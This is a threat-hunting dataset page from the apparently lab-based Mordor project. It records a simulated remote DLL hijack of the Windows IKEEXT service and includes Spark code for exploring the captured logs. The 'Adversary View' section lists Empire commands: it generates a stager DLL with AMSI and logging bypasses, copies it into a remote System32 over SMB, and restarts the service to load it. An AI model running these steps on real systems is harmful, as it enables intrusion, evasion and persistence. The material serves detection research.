IKEEXT Remote Service DLL Hijack

Metadata

Author

Roberto Rodriguez @Cyb3rWard0g

Creation Date

2019/04/03

Modification Date

2020/09/20

Tactics

[‘TA0003’, ‘TA0004’, ‘TA0005’]

Techniques

[‘T1574.001’]

Tags

[‘Remote Service DLL Hijacking’, ‘RPC over SMB Svcctl’]

Dataset Description

This dataset represents adversaries copying a file remotely to replace a file which is executed by a service that is vulnerable to DLL hijack. This dataset includes

Notebooks

Notebooks created by the community leveraging the mordor datasets

Author

Name

Link

Simulation Plan

Environment

Tool Type

Module

Mordor shire

C2

manual

Adversary View

(Empire: agents) > usestager windows/dll
(Empire: stager/windows/dll) > info
Name: DLL Launcher

Description:
  Generate a PowerPick Reflective DLL to inject with
  stager code.

Options:

  Name             Required    Value             Description
  ----             --------    -------           -----------
  Listener         True        http              Listener to use.
  Language         True        powershell        Language of the stager to generate.
  Arch             True        x64               Architecture of the .dll to generate
                                                (x64 or x86).
  StagerRetries    False       0                 Times for the stager to retry
                                                connecting.
  UserAgent        False       default           User-agent string to use for the staging
                                                request (default, none, or other).
  Proxy            False       default           Proxy to use for request (default, none,
                                                or other).
  ProxyCreds       False       default           Proxy credentials
                                                ([domain\]username:password) to use for
                                                request (default, none, or other).
  OutFile          True        /tmp/wlbsctrl.dll File to output dll to.
  Obfuscate        False       False             Switch. Obfuscate the launcher
                                                powershell code, uses the
                                                ObfuscateCommand for obfuscation types.
                                                For powershell only.
  ObfuscateCommand False       Token\All\1       The Invoke-Obfuscation command to use.
                                                Only used if Obfuscate switch is True.
                                                For powershell only.
  AMSIBypass       False       True              Include mattifestation's AMSI Bypass in
                                                the stager code.
  AMSIBypass2      False       False             Include Tal Liberman's AMSI Bypass in
                                                the stager code.
  ScriptLogBypass  False       True              Include cobbr's Script Block Log Bypass
                                                in the stager code.
  ETWBypass        False       False             Include tandasat's ETW bypass in the
                                                stager code.

(Empire: stager/windows/dll) > back
(Empire: agents) > agents

[*] Active agents:

  Name     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener
  ----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------
  GCSKD17Z ps 172.18.39.5     WORKSTATION5      *THESHIRE\pgustavo      powershell         1112   5/0.0    2020-09-22 03:51:02  http            

(Empire: agents) > interact GCSKD17Z
(Empire: GCSKD17Z) >
(Empire: GCSKD17Z) > upload /tmp/wlbsctrl.dll
[*] Tasked agent to upload wlbsctrl.dll, 124 KB
(Empire: GCSKD17Z) > shell COPY .\wlbsctrl.dll \\WORKSTATION6\C$\Windows\System32\wlbsctrl.dll
[*] Tasked GCSKD17Z to run TASK_SHELL
[*] Agent GCSKD17Z tasked with task ID 3
(Empire: GCSKD17Z) > 
..Command execution completed.

(Empire: GCSKD17Z) > shell sc.exe `\`\WORKSTATION6 stop IKEEXT
[*] Tasked GCSKD17Z to run TASK_SHELL
[*] Agent GCSKD17Z tasked with task ID 4
(Empire: GCSKD17Z) > 
SERVICE_NAME: IKEEXT 
        TYPE               : 30  WIN32  
        STATE              : 3  STOP_PENDING 
                                (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x1388

..Command execution completed.

(Empire: GCSKD17Z) > shell sc.exe `\`\WORKSTATION6 query IKEEXT
[*] Tasked GCSKD17Z to run TASK_SHELL
[*] Agent GCSKD17Z tasked with task ID 5
(Empire: GCSKD17Z) > 
SERVICE_NAME: IKEEXT 
        TYPE               : 20  WIN32_SHARE_PROCESS  
        STATE              : 1  STOPPED 
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0

..Command execution completed.

(Empire: GCSKD17Z) > shell sc.exe `\`\WORKSTATION6 start IKEEXT
[*] Tasked GCSKD17Z to run TASK_SHELL
[*] Agent GCSKD17Z tasked with task ID 6
(Empire: GCSKD17Z) > 
SERVICE_NAME: IKEEXT 
        TYPE               : 30  WIN32  
        STATE              : 2  START_PENDING 
                                (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x7d0
        PID                : 6172
        FLAGS              : 

..Command execution completed.

(Empire: GCSKD17Z) >

Explore Mordor Dataset

Initialize Analytics Engine

from openhunt.mordorutils import *
spark = get_spark()

Download & Process Mordor File

mordor_file = "https://raw.githubusercontent.com/OTRF/mordor/master/datasets/small/windows/lateral_movement/host/empire_shell_dcerpc_smb_service_dll_hijack.zip"
registerMordorSQLTable(spark, mordor_file, "mordorTable")
[+] Processing a Spark DataFrame..
[+] DataFrame Returned !
[+] Temporary SparkSQL View: mordorTable 

Get to know your data

df = spark.sql(
'''
SELECT Hostname,Channel,EventID, Count(*) as count
FROM mordorTable
GROUP BY Hostname,Channel,EventID
ORDER BY count DESC
'''
)
df.show(truncate=False)
+---------------------------+----------------------------------------+-------+-----+
|Hostname                   |Channel                                 |EventID|count|
+---------------------------+----------------------------------------+-------+-----+
|MORDORDC.theshire.local    |Security                                |4658   |768  |
|WORKSTATION5.theshire.local|Windows PowerShell                      |800    |508  |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational    |10     |466  |
|WORKSTATION5.theshire.local|Microsoft-Windows-PowerShell/Operational|4103   |409  |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational    |13     |386  |
|MORDORDC.theshire.local    |Security                                |4656   |384  |
|MORDORDC.theshire.local    |Security                                |4690   |384  |
|MORDORDC.theshire.local    |Security                                |4663   |367  |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational    |12     |328  |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational    |7      |286  |
|MORDORDC.theshire.local    |Security                                |5447   |192  |
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational    |12     |176  |
|MORDORDC.theshire.local    |Microsoft-Windows-PowerShell/Operational|4103   |169  |
|MORDORDC.theshire.local    |Windows PowerShell                      |800    |169  |
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational    |10     |158  |
|MORDORDC.theshire.local    |Security                                |5156   |123  |
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational    |7      |92   |
|MORDORDC.theshire.local    |Security                                |5158   |89   |
|WORKSTATION5.theshire.local|security                                |5158   |76   |
|MORDORDC.theshire.local    |Security                                |4703   |72   |
+---------------------------+----------------------------------------+-------+-----+
only showing top 20 rows